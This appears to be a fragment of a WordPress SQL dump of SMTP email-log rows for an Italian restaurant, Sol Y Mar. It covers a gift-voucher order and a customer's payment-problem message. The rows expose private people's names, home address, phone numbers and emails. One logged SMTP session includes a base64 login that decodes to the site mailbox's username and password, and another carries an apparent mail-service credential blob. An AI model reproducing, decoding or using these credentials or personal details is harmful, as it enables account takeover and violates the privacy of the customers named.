0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22081,1164,'original_headers','Content-Type: text/html\r\nReply-to: Marcello Manduchi <marcello.manduchi@hotmail.it>\r\n'),(22082,1164,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Hai r=\r\nicevuto il seguente ordine da Marcello Manduchi:</p>=0A=0A<h2 style=3D\'c=\r\nolor: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica,=\r\n Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-hei=\r\nght: 130%; margin: 0 0 18px; text-align: left;\'>=0A=09<a class=3D\"link\"=\r\n href=3D\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3D1141&=\r\namp;action=3Dedit\" style=3D\"font-weight: normal; text-decoration: underl=\r\nine; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>=0A=0A<di=\r\nv style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D\"td\" cellspacing=\r\n=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #737373; border: 1=\r\npx solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Hel=\r\nvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=\r\n=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"colo=\r\nr: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding:=\r\n 12px; text-align: left;\">Prodotto</th>=0A=09=09=09=09<th class=3D\"td\" s=\r\ncope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertica=\r\nl-align: middle; padding: 12px; text-align: left;\">Quantit=C3=A0</th>=0A=\r\n=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; bord=\r\ner: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align=\r\n: left;\">Prezzo</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=\r\n=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align=\r\n: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Buono Rega=\r\nlo (valore a scelta) (#coupon)<ul class=3D\"wc-item-meta\" style=3D\"font-s=\r\nize: small; margin: 1em 0 0; padding: 0; list-style: none;\">=0A<li style=\r\n=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-lab=\r\nel\" style=3D\"float: left; margin-right: .25em; clear: both;\">To Name:</s=\r\ntrong> <p style=3D\"margin: 0;\">Filippo Saulle</p>=0A</li>=0A<li style=3D=\r\n\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\"=\r\n style=3D\"float: left; margin-right: .25em; clear: both;\">To:</strong> <=\r\np style=3D\"margin: 0;\"><a href=3D\"mailto:Filos4@libero.it\" style=3D\"colo=\r\nr: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@lib=\r\nero.it</a></p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=\r\n=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-rig=\r\nht: .25em; clear: both;\">From:</strong> <p style=3D\"margin: 0;\">Amalia e=\r\n Riccardo Manduchi</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding=\r\n: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; marg=\r\nin-right: .25em; clear: both;\">Message:</strong> <p style=3D\"margin: 0;\"=\r\n>Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e=\r\n delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>=0A</li>=\r\n=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align=\r\n: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-=\r\nserif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color=\r\n: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; v=\r\nertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto,=\r\n Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount=\r\n amount\">100,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=\r\n=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=0A=09=09</tbody>=0A=09=09<=\r\ntfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"t=\r\nd\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; bord=\r\ner-top-width: 4px;\">Subtotale:</th>=0A=09=09=09=09=09=09<td class=3D\"td\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left; border-top-width: 4px;\"><span clas=\r\ns=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"woocommerce-P=\r\nrice-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"t=\r\nd\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Met=\r\nodo di pagamento:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"col=\r\nor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding:=\r\n 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"=\r\nrow\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; v=\r\nertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>=0A=\r\n=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;=\r\n\"><span class=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"w=\r\noocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=\r\n=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=\r\n=3D\"0\" style=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; p=\r\nadding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D=\r\n\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Ari=\r\nal, sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color:=\r\n #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Robo=\r\nto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height:=\r\n 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h=\r\n2>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"padding: 12px; colo=\r\nr: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Marcello Manduchi=\r\n<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORL=C3=8C-CESENA=09=\r\n=09=09=09=09=09=09=09=09<br><a href=3D\"tel:3204217844\" style=3D\"color: #=\r\n557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09<br>marcello.manduchi@hotmail.it=\r\n=09=09=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table=\r\n>=0A<p style=3D\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=\r\n=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=\r\n=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=\r\n=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" cell=\r\npadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=\r\n=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top=\r\n\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kWyFQ-0007wc-HN\r\n'),(22083,1165,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22084,1165,'success',''),(22085,1165,'from_header','Lara Guccini <notifiche@ristorantesolymar.it>'),(22086,1165,'to_header','teosphone@gmail.com'),(22087,1165,'reply_to_header','laraguccini@yahoo.it'),(22088,1165,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22089,1165,'original_to','[\"teosphone@gmail.com\"]'),(22090,1165,'original_subject','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"'),(22091,1165,'original_message','Da: Lara Guccini <laraguccini@yahoo.it>\nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22092,1165,'original_headers','From: Lara Guccini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: laraguccini@yahoo.it\n'),(22093,1165,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:53:48 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22094,1166,'solution','Not found, check status column for more info.'),(22095,1166,'success','1'),(22096,1166,'from_header','Lara Guccini <notifiche@ristorantesolymar.it>'),(22097,1166,'to_header','teosphone@gmail.com'),(22098,1166,'reply_to_header','laraguccini@yahoo.it'),(22099,1166,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22100,1166,'original_to','[\"teosphone@gmail.com\"]'),(22101,1166,'original_subject','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"'),(22102,1166,'original_message','Da: Lara Guccini <laraguccini@yahoo.it>\nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22103,1166,'original_headers','From: Lara Guccini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: laraguccini@yahoo.it\n'),(22104,1166,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:53:50 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Lara Guccini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: laraguccini@yahoo.it\r\nMessage-Id: <96ea4aa992894f2efed117a21791ada7@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"\r\nDate: Mon, 26 Oct 2020 08:53:50 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Lara Guccini <laraguccini@yahoo.it>=0ATelefono: 3803334875=0AOggetto=\r\n: Regalo coupon per cena 100 euro=0A=0ACorpo del messaggio:=0AHo provato=\r\n diverse volte all=E2=80=99acquisto di un buono cena ma non mi viene con=\r\nsentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? P=\r\notrei fare bonifico? Grazie Lara=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1kWyGE-00085R-Hp\r\n'),(22105,1167,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22106,1167,'success',''),(22107,1167,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22108,1167,'to_header','notifiche@ristorantesolymar.it'),(22109,1167,'reply_to_header','Marcello Manduchi <marcello.manduchi@hotmail.it>'),(22110,1167,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22111,1167,'original_to','[\"notifiche@ristorantesolymar.it\"]'),(22112,1167,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020'),(22113,1167,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 